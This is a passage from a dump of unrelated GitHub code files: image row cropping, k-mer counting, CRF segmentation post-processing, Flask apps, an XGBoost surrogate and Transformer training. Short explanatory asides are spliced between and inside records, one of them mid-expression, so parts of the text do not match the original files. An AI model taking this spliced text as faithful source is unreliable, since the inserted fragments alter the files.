40: # параметры высоты изображения, image.shape = тип tuple\n os.remove(os.path.join(path, img))\n a += 1\n except Exception as e:\n print(e)\n\n\ndef rows(path1):\n \"\"\"\n Функция ищет горизонтальные линии - строки, обрезает по строкам изображение\n :param path1: путь к директрии, в которой хранятся изображения для обрезки\n \"\"\"\n fds = os.listdir(path1)\n\n a = 0\n\n for img in fds:\n if re.search(\"bonus\", img):\n # IMREAD_GRAYSCALE обязательный параметр при считывании, без него нельзя работать с шумами изобр.\n image = cv2.imread(os.path.join(path1, img), cv2.IMREAD_GRAYSCALE)\n original = np.copy(image) # сохранение оригинала\n\n i = None\n\n (thresh, img_bin) = cv2.threshold(\n image, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n ) # создание шума\n img_bin = 255 - 
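A usage sketch for the perspective-crop helpers above, assuming they are importable (corner coordinates invented; any cv2-loaded BGR array works the same way):

import cv2
import numpy as np

image = np.zeros((200, 250, 3), dtype=np.uint8) # dummy BGR canvas
pts = np.array([[10, 10], [210, 20], [200, 160], [15, 150]], dtype="float32")
# order_points rearranges to [top-left, top-right, bottom-right, bottom-left]
warped = four_point_transform(image, pts)
print(warped.shape) # -> (140, 200, 3): maxHeight x maxWidth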
img_bin\n\n            # kernel length; the last number is roughly the image width in pixels\n            kernel_length = np.array(image).shape[1] // 25\n            # detect horizontal lines\n            horizontal_kernel = cv2.getStructuringElement(\n                cv2.MORPH_RECT, (kernel_length, 1)\n            )\n            img_temp2 = cv2.erode(img_bin, horizontal_kernel, iterations=3)\n            horizontal_lines_img = cv2.dilate(\n                img_temp2, horizontal_kernel, iterations=3\n            )\n            edges = cv2.Laplacian(horizontal_lines_img, cv2.CV_8U)\n            # ядро используется для удаления вертик. линий и коротких гориз. линий\n            kernel1 = np.zeros((7, 31), np.uint8)\n            kernel1[2, :] = 1\n            eroded = cv2.morphologyEx(edges, cv2.MORPH_ERODE, kernel1)\n\n            indices = np.nonzero(eroded) # координаты гориз. линий\n            rows = np.unique(indices[0]) # координата y\n\n            filtered_rows = []\n            for ii in range(len(rows)):\n                if ii == 0:\n                    filtered_rows.append(rows[ii])\n                else:\n                    if np.abs(rows[ii] - rows[ii - 1]) >= 6:\n                        filtered_rows.append(rows[ii])\n            print(filtered_rows)\n            # вырезание строк\n            try:\n                for i in np.arange(len(filtered_rows) - 1):\n                    cv2.imwrite(\n                        (os.path.join(path1, str(\"box__\") + str(random_name) + str(i + a)) + \".jpg\"),\n                        original[filtered_rows[i] : filtered_rows[i + 1]],\n                    )\n            except IndexError:\n                print(\"That's all\")\n\n            a = a + i\n\n            if image.shape[0] > 50:\n                os.remove(os.path.join(path1, img)) # удаление строк, у которых высота больше 50 пикселей\n\n    return a + 1\n","repo_name":"Maksim339/bonus_sys","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6844684296","text":"import collections\nfrom operator import itemgetter\n\ndef get_kmer_occurences(seq, kmer_len):\n    \"\"\"\n    return a list of tuples\n    each tuple contains a kmer present in seq and its occurrence\n    \"\"\"\n    kmers = collections.defaultdict(int)\n    stop = len(seq) - kmer_len\n    for i in range(stop + 1):\n        kmer = seq[i : i + kmer_len]\n        kmers[kmer] += 1\n    kmers = sorted(kmers.items(), key = itemgetter(1), reverse =True)\n    return kmers\n    ","repo_name":"C3BI-pasteur-fr/python-solutions-1","sub_path":"source/_static/code/kmer_2.py","file_name":"kmer_2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24893750461","text":"\"\"\"\nLos alumnos de un curso se han dividido en dos grupos A y B de acuerdo al sexo y el nombre. El grupo A esta formado por las mujeres con un nombre anterior a la M y los hombres con un nombre posterior a la N y el grupo B por el resto. 
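For reference, the fixed k-mer counter above collapses onto the standard library's Counter; a hedged equivalent:

from collections import Counter

def kmer_counts(seq, k):
    # Slide a width-k window across seq and let Counter tally the k-mers.
    return Counter(seq[i:i + k] for i in range(len(seq) - k + 1)).most_common()

print(kmer_counts("ACGTACGA", 3))
# -> [('ACG', 2), ('CGT', 1), ('GTA', 1), ('TAC', 1), ('CGA', 1)]
# (ties after the leading 'ACG' keep first-seen order)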
Escribir un programa que pregunte al usuario su nombre y sexo, y muestre por pantalla el grupo que le corresponde.\n\"\"\"\n\ndef pedirNombre():\n \"\"\"\n Solicita un nombre por consola.\n\n Retorna\n -------\n str \n una cadena de caracteres con el nombre introducido\n \"\"\"\n return input (\"Introduce tu nombre: \")\n\ndef pedirSexo():\n \"\"\"\n Solicita el sexo por consola.\n\n Retorna\n -------\n str \n un caracter con el tipo de sexo (M/F)\n \"\"\"\n\n sexo = \"\"\n while sexo != \"M\" and sexo != \"F\":\n sexo = input(\"Introduce tu sexo (M/F): \").upper()\n\n\n return sexo\n\ndef asignarGrupo(nombre , sexo):\n \"\"\"\n Asigna el grupo del curso según su nombre y sexo.\n \n Parámetros\n ----------\n str \n el nombre de un alumno\n str \n el sexo del alumno\n \n Retorna\n ---------\n str \n un caracter con el tipo de sexo (M/F)\n \"\"\"\n\n inicialNombre = nombre[0:1].upper()\n grupo = \"\"\n if (sexo == \"M\" and inicialNombre >= \"N\") or (sexo == \"F\" and inicialNombre < \"M\"):\n grupo = \"A\"\n else:\n grupo = \"B\"\n\n return grupo\n\ndef main():\n nombre = pedirNombre()\n\n sexo = pedirSexo()\n\n print(f\"Estás em el grupo {asignarGrupo(nombre, sexo)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-LautaroKruck","sub_path":"src/practica_2_1/ej2_1_6.py","file_name":"ej2_1_6.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70525346349","text":"\"\"\"\nOptimization of Post-Processing for 3D Fully Connected Conditional Random Fields(CRF)\n\"\"\"\n\nimport os\nimport sys\nsys.path.append(os.path.split(sys.path[0])[0])\n\nimport collections\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport SimpleITK as sitk\n\nimport pydensecrf.densecrf as dcrf\nfrom pydensecrf.utils import create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax\n\nimport skimage.measure as measure\nimport skimage.morphology as morphology\nfrom utilities.calculate_metrics import Metirc\n\nimport parameter as para\n\nfile_name = [] # File name\n\n# Definition of evaluation indicators\nIA_score = collections.OrderedDict()\nIA_score['dice'] = []\nIA_score['jacard'] = []\nIA_score['voe'] = []\nIA_score['fnr'] = []\nIA_score['fpr'] = []\nIA_score['assd'] = []\nIA_score['rmsd'] = []\nIA_score['msd'] = []\n\n# Define two variables in order to calculate global dice\ndice_intersection = 0.0 \ndice_union = 0.0\n\nfor file_index, file in enumerate(os.listdir(os.path.join(para.test_set_path, 'ct'))):\n\n print('file index:', file_index, file)\n \n file_name.append(file)\n\n ct = sitk.ReadImage(os.path.join(os.path.join(para.test_set_path, 'ct'), file), sitk.sitkInt16)\n ct_array = sitk.GetArrayFromImage(ct) \n ct_array = ct_array.astype(np.float32) \n\n pred = sitk.ReadImage(os.path.join(para.pred_path, file.replace('volume', 'pred')), sitk.sitkUInt8)\n pred_array = sitk.GetArrayFromImage(pred)\n\n seg = sitk.ReadImage(os.path.join(os.path.join(para.test_set_path, 'seg'), file.replace('volume', 'segmentation')), sitk.sitkUInt8)\n seg_array = sitk.GetArrayFromImage(seg)\n seg_array[seg_array > 0] = 1\n\n new_ct_array = ct_array\n new_pred_array = pred_array\n\n # Defining Conditional Random Fields(CRF)\n print('Begin CRF post-processing')\n n_labels = 2\n d = dcrf.DenseCRF(np.prod(new_ct_array.shape), n_labels)\n\n # Obtaining the unary potential\n unary = np.zeros_like(new_pred_array, dtype=np.float32)\n unary[new_pred_array == 0] 
= 0.1\n unary[new_pred_array == 1] = 0.9\n\n U = np.stack((1 - unary, unary), axis=0)\n d.setUnaryEnergy(unary_from_softmax(U))\n\n # Obtaining the pairwise potential \n # This creates the color-independent features and then add them to the CRF\n feats = create_pairwise_gaussian(sdims=(para.s1, para.s1, para.s1), shape=new_ct_array.shape)\n d.addPairwiseEnergy(feats, compat=3, kernel=dcrf.DIAG_KERNEL, normalization=dcrf.NORMALIZE_SYMMETRIC)\n\n feats = create_pairwise_bilateral(sdims=(para.s2, para.s2, para.s2), schan=(para.s3,), img=new_ct_array)\n d.addPairwiseEnergy(feats, compat=10, kernel=dcrf.DIAG_KERNEL, normalization=dcrf.NORMALIZE_SYMMETRIC)\n\n # Draw inferences\n Q, tmp1, tmp2 = d.startInference()\n for i in tqdm(range(para.max_iter)):\n # print(\"KL-divergence at {}: {}\".format(i, d.klDivergence(Q)))\n d.stepInference(Q, tmp1, tmp2)\n\n # Getting predictive labeling results\n MAP = np.argmax(np.array(Q), axis=0).reshape(new_pred_array.shape)\n IA_seg = np.zeros_like(seg_array, dtype=np.uint8)\n IA_seg= MAP.astype(np.uint8)\n IA_seg = measure.label(IA_seg, connectivity=1)\n props = measure.regionprops(IA_seg)\n \n max_area = 0\n max_index = 0\n for index, prop in enumerate(props, start=1):\n if prop.area > max_area:\n max_area = prop.area\n max_index = index\n \n IA_seg[IA_seg != max_index] = 0\n IA_seg[IA_seg == max_index] = 1\n \n IA_seg = IA_seg.astype(np.bool_)\n morphology.remove_small_holes(IA_seg, para.maximum_hole, connectivity=2, in_place=True)\n\n IA_seg = IA_seg.astype(np.uint8) \n \n # Calculation of segmentation evaluation indicators\n IA_metric = Metirc(seg_array, IA_seg, ct.GetSpacing())\n\n IA_score['dice'].append(IA_metric.get_dice_coefficient()[0])\n IA_score['jacard'].append(IA_metric.get_jaccard_index())\n IA_score['voe'].append(IA_metric.get_VOE())\n IA_score['fnr'].append(IA_metric.get_FNR())\n IA_score['fpr'].append(IA_metric.get_FPR())\n IA_score['assd'].append(IA_metric.get_ASSD())\n IA_score['rmsd'].append(IA_metric.get_RMSD())\n IA_score['msd'].append(IA_metric.get_MSD())\n\n dice_intersection += IA_metric.get_dice_coefficient()[1]\n dice_union += IA_metric.get_dice_coefficient()[2]\n\n # Saving CRF post-processing results as nii data\n pred_seg = sitk.GetImageFromArray(IA_seg)\n pred_seg.SetDirection(ct.GetDirection())\n pred_seg.SetOrigin(ct.GetOrigin())\n pred_seg.SetSpacing(ct.GetSpacing())\n\n sitk.WriteImage(pred_seg, os.path.join(para.crf_path, file.replace('volume', 'crf')))\n\n print('dice:', IA_score['dice'][-1])\n print('--------------------------------------------------------------')\n\n\n# Write evaluation indicators to excel file\nIA_data = pd.DataFrame(IA_score, index=file_name)\n\nIA_statistics = pd.DataFrame(index=['mean', 'std', 'min', 'max'], columns=list(IA_data.columns))\nIA_statistics.loc['mean'] = IA_data.mean()\nIA_statistics.loc['std'] = IA_data.std()\nIA_statistics.loc['min'] = IA_data.min()\nIA_statistics.loc['max'] = IA_data.max()\n\nwriter = pd.ExcelWriter('./result-CRF.xlsx')\nIA_data.to_excel(writer, 'IA')\nIA_statistics.to_excel(writer, 'IA_statistics')\nwriter.save()\n\n# Print global dice\nprint('dice global:', dice_intersection / dice_union)\n","repo_name":"jjiang-mtu/ARU-Net","sub_path":"denseCRF/3D-CRF.py","file_name":"3D-CRF.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3239508706","text":"import pandas as pd\nimport numpy as np\n\n\ndef overlap(box, boxVect):\n\ta = boxVect[:,2] <= box[0]\n\tb = 
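The keep-largest-component pass in 3D-CRF.py above is a standard segmentation post-processing idiom; a standalone 2D toy version (scikit-image required, blob sizes invented):

import numpy as np
import skimage.measure as measure

mask = np.zeros((8, 8), dtype=np.uint8)
mask[1:3, 1:3] = 1 # small blob: 4 pixels
mask[4:8, 4:8] = 1 # large blob: 16 pixels

labels = measure.label(mask, connectivity=1)
largest = max(measure.regionprops(labels), key=lambda p: p.area).label
print((labels == largest).sum()) # -> 16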
boxVect[:,0] >= box[2]\n\tc = boxVect[:,3] <= box[1]\n\td = boxVect[:,1] >= box[3]\n\tcond = np.any([a,b,c,d], axis = 0)\n\n\treturn ~cond\n\ndef point_in_box(pt, boxVect):\n\ta = boxVect[:,0] <= pt[0]\n\tb = boxVect[:,2] >= pt[0]\n\tc = boxVect[:,1] <= pt[1]\n\td = boxVect[:,3] >= pt[1]\n\n\tcond = np.all([a,b,c,d], axis = 0)\n\n\treturn cond\n\ndef sample(times, interval = 5):\n\tselect = []\n\ts = times[0]\n\n\tfor time in times[1:]:\n\t\tif (time - s).seconds > interval:\n\t\t\tselect.append(False)\n\t\telse:\n\t\t\tselect.append(True)\n\t\t\ts = time\n\n\treturn select\n","repo_name":"BLue1881euLB/gps2road","sub_path":"gps_2_road-master/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70445946986","text":"import sys\ninput = lambda : sys.stdin.readline().rstrip()\n\nn = int(input())\n\nfnum = 0\ntnum = 0\n\nif n % 5 == 0:\n fnum = n // 5\n print(fnum)\nelif n == 4 or n == 7:\n print(-1)\nelif n % 5 == 1:\n tnum = 2\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 2:\n tnum = 4\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 3:\n tnum = 1\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 4:\n tnum = 3\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelse:\n print(-1)\n\n\n'''\n#훨씬 좋은 코드\n\nkg = int(input()) # 총 설탕 킬로그램 입력받기\n\ncnt = 0 # 3 빼줄 횟수 셀 변수선언 (즉, 3킬로 봉지량) \n\nwhile kg >= 0: # kg가 0보다 클때 동안만 도는 반복문\n\tif kg % 5 == 0: # 만약 5의 배수면 바로 출력!!!\n\t\tprint(kg // 5 + cnt) # 5로 나눈 몫과 3킬로 봉지수 출력\n\t\tbreak # else문 안걸리게 탈출\n\tkg = kg - 3 # 3킬로 빼줘라\n\tcnt += 1 # 빼준 횟수 하나씩 증가\nelse:\n\tprint(-1) # 다 돌았는데도 없음 -1 !!\n\n\n'''","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/baekjoon/algorithm_type/Greedy/re2839.py","file_name":"re2839.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31463244254","text":"from flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__) # sets name to main\n# have debug mode on in command prompt\n# route() for different aspects of the website see the 2 functions below\n# render_template() allows us to send files to web page - need to save html in a folder named 'templates'\n\n'''''\n@app.route('//') # decorator if param has arg with '<>'-we can parse arg. 
eg, username may be parsed\ndef hello_world(username='username', post_id=None):\n    return render_template('index.html', name=username, post_id=post_id)\n'''\n\n\n@app.route('/<page_name>')\ndef html_pg(page_name):\n    return render_template(page_name)\n\n\n@app.route('/') # homepage\ndef st():\n    return render_template('index.html')\n\n\n@app.route('/sub_message', methods=['POST', 'GET'])\ndef sub_message():\n    if request.method == 'POST':\n        try:\n            data = request.form.to_dict() # stores data as dictionary\n            print(data)\n            write_to_csv(data) # calling the function we created below\n            return redirect('/thanks.html') # thank you message once form is submitted\n        except:\n            return 'Unable to save to the database'\n    else:\n        return 'something went wrong'\n\n\ndef to_file(data): # function that will save data into a text file that we created\n    with open('database.txt', mode='a') as database: # mode = a is append\n        email = data[\"email\"]\n        subject = data[\"subject\"]\n        message = data[\"message\"]\n        file = database.write(f'\\n{email}, {subject}, {message}') # writing to text file\n\n\ndef write_to_csv(data): # going to send data to csv file\n    with open('database.csv', newline='', mode='a') as database2:\n        email = data[\"email\"]\n        subject = data[\"subject\"]\n        message = data[\"message\"]\n        csv_writer = csv.writer(database2, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n        csv_writer.writerow([email, subject, message]) # row of data\n","repo_name":"ElianBooysen/portfo","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18194302872","text":"import warnings\nfrom typing import Tuple\n\nimport numpy as np\nimport pandas as pd\n\nfrom bofire.utils.tmpfile import make_tmpfile\n\ntry:\n    from xgboost import XGBRegressor # type: ignore\nexcept ImportError:\n    warnings.warn(\"xgboost not installed, BoFire's `XGBoostSurrogate` cannot be used.\")\n\nimport uuid\n\nfrom bofire.data_models.surrogates.api import XGBoostSurrogate as DataModel\nfrom bofire.surrogates.surrogate import Surrogate\nfrom bofire.surrogates.trainable import TrainableSurrogate\n\n\nclass XGBoostSurrogate(TrainableSurrogate, Surrogate):\n    def __init__(self, data_model: DataModel, **kwargs) -> None:\n        self.n_estimators = data_model.n_estimators\n        self.max_depth = data_model.max_depth\n        self.max_leaves = data_model.max_leaves\n        self.max_bin = data_model.max_bin\n        self.grow_policy = data_model.grow_policy\n        self.learning_rate = data_model.learning_rate\n        self.objective = data_model.objective\n        self.booster = data_model.booster\n        self.n_jobs = data_model.n_jobs\n        self.gamma = data_model.gamma\n        self.min_child_weight = data_model.min_child_weight\n        self.max_delta_step = data_model.max_delta_step\n        self.subsample = data_model.subsample\n        self.sampling_method = data_model.sampling_method\n        self.colsample_bytree = data_model.colsample_bytree\n        self.colsample_bylevel = data_model.colsample_bylevel\n        self.colsample_bynode = data_model.colsample_bynode\n        self.reg_alpha = data_model.reg_alpha\n        self.reg_lambda = data_model.reg_lambda\n        self.scale_pos_weight = data_model.scale_pos_weight\n        self.random_state = data_model.random_state\n        self.num_parallel_tree = data_model.num_parallel_tree\n        self.tmpfile_name = f\"xgb_{uuid.uuid4().hex}.json\"\n        super().__init__(data_model=data_model, **kwargs)\n\n    def _init_xgb(self):\n        self.model = XGBRegressor(\n            n_estimators=self.n_estimators,\n            max_depth=self.max_depth,\n            
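For the variable route reconstructed above, a minimal self-contained reminder of Flask's variable-rule pattern (app and view names illustrative):

from flask import Flask

demo = Flask(__name__)

@demo.route('/<page_name>')
def serve_page(page_name):
    # Flask passes the matched path segment as the keyword argument of the same name.
    return f"you asked for {page_name}"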
max_leaves=self.max_leaves,\n max_bin=self.max_bin,\n grow_policy=self.grow_policy,\n learning_rate=self.learning_rate,\n objective=self.objective,\n booster=self.booster,\n n_jobs=self.n_jobs,\n gamma=self.gamma,\n min_child_weight=self.min_child_weight,\n max_delta_step=self.max_delta_step,\n subsample=self.subsample,\n sampling_method=self.sampling_method,\n colsample_bytree=self.colsample_bytree,\n colsample_bylevel=self.colsample_bylevel,\n colsample_bynode=self.colsample_bynode,\n reg_alpha=self.reg_alpha,\n reg_lambda=self.reg_lambda,\n scale_pos_weight=self.scale_pos_weight,\n random_state=self.random_state,\n num_parallel_tree=self.num_parallel_tree,\n )\n\n def _fit(self, X: pd.DataFrame, Y: pd.DataFrame, **kwargs):\n transformed_X = self.inputs.transform(X, self.input_preprocessing_specs)\n self._init_xgb()\n self.model.fit(X=transformed_X.values, y=Y.values)\n\n def _predict(self, transformed_X: pd.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n preds = self.model.predict(transformed_X.values)\n return preds.reshape((transformed_X.shape[0], 1)), np.zeros(\n (transformed_X.shape[0], 1)\n )\n\n def loads(self, data: str):\n with make_tmpfile(name=self.tmpfile_name) as fname:\n # write to file\n self._init_xgb()\n with open(fname, \"w\") as f:\n f.write(data)\n self.model.load_model(fname)\n\n def _dumps(self) -> str:\n with make_tmpfile(name=self.tmpfile_name) as fname:\n self.model.save_model(fname=fname)\n with open(fname, \"r\") as f:\n dump = f.read()\n return dump\n","repo_name":"experimental-design/bofire","sub_path":"bofire/surrogates/xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"13499114842","text":"import time\r\nfrom typing import List\r\n\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom axformer.label_smoothing import LabelSmoothing\r\nfrom axformer.model.axformer import Axformer\r\nfrom axformer.noam_opt import NoamOpt\r\nfrom axformer.simple_loss_compute import SimpleLossCompute\r\nfrom axformer.data_utils import toy_data_gen, MyIterator, rebatch\r\nfrom axformer.multi_gpu_loss_compute import MultiGPULossCompute\r\n\r\ndef run_epoch(data_iter, model, loss_compute):\r\n \"Standard Training and Logging Function\"\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model.forward(batch.src, batch.trg,\r\n batch.src_mask, batch.trg_mask)\r\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n total_loss += loss\r\n total_tokens += batch.ntokens\r\n tokens += batch.ntokens\r\n if i % 50 == 1:\r\n elapsed = time.time() - start\r\n print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\r\n (i, loss / batch.ntokens, tokens / elapsed))\r\n start = time.time()\r\n tokens = 0\r\n return total_loss / total_tokens\r\n\r\ndef batch_size_fn(new, count, sofar, max_src_in_batch, max_tgt_in_batch):\r\n \"Keep augmenting batch and calculate total number of tokens + padding.\"\r\n if count == 1:\r\n max_src_in_batch = 0\r\n max_tgt_in_batch = 0\r\n max_src_in_batch = max(max_src_in_batch, len(new.src))\r\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.trg) + 2)\r\n src_elements = count * max_src_in_batch\r\n tgt_elements = count * max_tgt_in_batch\r\n return max(src_elements, tgt_elements), max_src_in_batch, max_tgt_in_batch\r\n\r\n\r\n# Train the simple copy task.\r\ndef toy_train():\r\n vocab_size, d_model, n_layers = 11, 512, 2\r\n model = Axformer(vocab_size, 
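The XGBoostSurrogate above simply forwards its fields into xgboost's scikit-learn interface; a bare-bones equivalent on random data (xgboost required, hyperparameters arbitrary):

import numpy as np
from xgboost import XGBRegressor

X, y = np.random.rand(32, 4), np.random.rand(32)
model = XGBRegressor(n_estimators=10, max_depth=3)
model.fit(X, y)
print(model.predict(X[:2]).shape) # -> (2,)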
vocab_size, n_layers=n_layers, d_model=d_model)\r\n\r\n criterion = LabelSmoothing(size=vocab_size, padding_idx=0, smoothing=0.0)\r\n\r\n model_opt = NoamOpt(d_model, 1, 400,\r\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n\r\n for epoch in range(10):\r\n model.train()\r\n run_epoch(toy_data_gen(vocab_size, batch_size=30, nbatches=20), model,\r\n SimpleLossCompute(model.generator, criterion, model_opt))\r\n model.eval()\r\n print(run_epoch(toy_data_gen(vocab_size, batch_size=30, nbatches=5), model,\r\n SimpleLossCompute(model.generator, criterion, None)))\r\n\r\ndef create_iterators(devices:List[int], SRC, TGT, train, val):\r\n pad_idx = TGT.vocab.stoi[\"\"]\r\n model = Axformer(len(SRC.vocab), len(TGT.vocab), n_layers=6)\r\n model.cuda()\r\n criterion = LabelSmoothing(size=len(TGT.vocab), padding_idx=pad_idx, smoothing=0.1)\r\n criterion.cuda()\r\n BATCH_SIZE = 12000\r\n train_iter = MyIterator(train, batch_size=BATCH_SIZE, device=0,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=True)\r\n valid_iter = MyIterator(val, batch_size=BATCH_SIZE, device=0,\r\n repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n batch_size_fn=batch_size_fn, train=False)\r\n model_par = nn.DataParallel(model, device_ids=devices)\r\n\r\n return train_iter, valid_iter, model_par\r\n\r\ndef train(devices, criterion, pad_idx, model, train_iter, valid_iter, model_par, epochs=10):\r\n model_opt = NoamOpt(model.src_embed[0].d_model, 1, 2000,\r\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n for epoch in range(epochs):\r\n model_par.train()\r\n run_epoch((rebatch(pad_idx, b) for b in train_iter),\r\n model_par,\r\n MultiGPULossCompute(model.generator, criterion,\r\n devices=devices, opt=model_opt))\r\n model_par.eval()\r\n loss = run_epoch((rebatch(pad_idx, b) for b in valid_iter),\r\n model_par,\r\n MultiGPULossCompute(model.generator, criterion,\r\n devices=devices, opt=None))\r\n print(loss)","repo_name":"sytelus/axformer","sub_path":"axformer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36443297741","text":"from loguru import logger\n\nlogger.add(\"debug.log\", rotation=\"100 MB\", colorize=True, format=\"{time} {message}\")\n\n\nclass Mapper:\n def __init__(self, r1, s1, r2, s2):\n self.s1 = s1\n self.s2 = s2\n self.r1 = r1\n self.r2 = r2\n\n def formula(self, r1, s1, r2, s2, x):\n y= ((s2 - s1) * x + (-s2 * r1) + (s1 * r2)) / (r2 - r1)\n # logger.debug(f\"input: {x} output: {y} @ (r1,s1)=({r1},{s1});(r2,s2)=({r2},{s2})\")\n return y\n\n def transform(self, x):\n if 0 <= x < self.r1:\n return self.formula(0, 0, self.r1, self.s1, x)\n elif self.r1 <= x < self.r2:\n return self.formula(self.r1, self.s1, self.r2, self.s2, x)\n elif self.r2 <= x <= 255:\n return self.formula(self.r2, self.s2, 255, 255,x)\n else:\n raise Exception(\"x not in range\")\n","repo_name":"Bamdad-rar/Digital-Image-Processing","sub_path":"Exercise_02/Q02/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8061981999","text":"#Imports\n\nfrom asyncio import subprocess\nfrom tabnanny import check\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom 
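The Mapper above implements the classic three-segment piecewise-linear contrast stretch; one transform worked by hand with invented breakpoints (assuming the class is importable):

m = Mapper(r1=70, s1=30, r2=140, s2=220)
# Middle segment: y = ((s2 - s1) * x - s2 * r1 + s1 * r2) / (r2 - r1)
# x = 100: (190 * 100 - 220 * 70 + 30 * 140) / 70 = 7800 / 70 = 111.43...
print(round(m.transform(100), 2)) # -> 111.43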
flask_cors import CORS, cross_origin\n\n\nimport json\nimport subprocess\nimport os\nimport signal\n\nimport utils.utilsDB as utilsDB\n\n#Flask Settings\n\napp = Flask(__name__, template_folder=\"templates\")\ncors = CORS(app, resources={r\"/*\":{\"origins\": \"http://localhost:8085\"}})\napp.config['JSON_SORT_KEYS'] = False\nlimiter = Limiter(app,key_func=get_remote_address)\n\n#Flask routes\n\n@app.route(\"/\")\n@limiter.limit(\"30/second\")\ndef mainPage():\n return render_template('index.html')\n\n@app.route('/')\ndef fallback(page):\n return render_template('index.html')\n\n@app.route(\"/login\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef login():\n username = \"\"\n password = \"\"\n if(request.method == 'POST'):\n username = request.json['username']\n password = request.json['password']\n return jsonify(utilsDB.login(username, password))\n \n@app.route(\"/executeScript\")\n@limiter.limit(\"30/second\")\ndef executeScript(): \n process = subprocess.Popen(\"python3.9 ./requestsAQICN.py\", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)\n utilsDB.saveProcessPid(process.pid)\n while True:\n output = process.stdout.readline()\n if output == '' and process.poll() is not None:\n break\n if output:\n print(output.decode(\"utf-8\").strip())\n rc = process.poll()\n return jsonify(\"Complete\") \n \n@app.route(\"/killScript\")\n@limiter.limit(\"30/second\")\ndef killScript():\n pid = utilsDB.getProcessPid() \n os.killpg(os.getpgid(pid[0]), signal.SIGTERM)\n return jsonify(\"Complete\") \n \n@app.route(\"/getScriptCount\")\n@limiter.limit(\"30/second\")\ndef getScriptCount():\n return jsonify(utilsDB.getScriptCount())\n\n@app.route(\"/GeoJson/provinces\")\n@limiter.limit(\"30/second\")\ndef getGeoJSONProvinces():\n json_file = open(\"data/provinces.json\")\n json_object = json.load(json_file)\n json_file.close()\n return jsonify(json_object)\n\n@app.route(\"/GeoJson/autonomous_regions\")\n@limiter.limit(\"30/second\")\ndef getGeoJSONAutonomousRegions():\n json_file = open(\"data/autonomous_regions.json\")\n json_object = json.load(json_file)\n json_file.close()\n return jsonify(json_object)\n\n@app.route(\"/getAllData\")\n@limiter.limit(\"30/second\")\ndef getAllData():\n return jsonify(utilsDB.get_all_air_pollution_data())\n\n@app.route(\"/getData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getData():\n location_name = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_data(location_name, date))\n\n@app.route(\"/getStatisticalData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getStatisticalData():\n location_name = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_statistical_data(location_name, date))\n\n@app.route(\"/getForecastData\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getForecastData():\n location_name = \"\"\n pollutant = \"\"\n date = \"\"\n if(request.method == 'POST'):\n location_name = request.json['location_name']\n pollutant = request.json['pollutant_name']\n date = request.json['date']\n return jsonify(utilsDB.get_air_pollution_forecast_data(location_name,pollutant, date))\n\n@app.route(\"/getNearestLocationDataDate\", methods=['POST'])\n@limiter.limit(\"30/second\")\ndef getNearestLocationDataDate():\n location_name = \"\"\n if(request.method == 'POST'):\n location_name = 
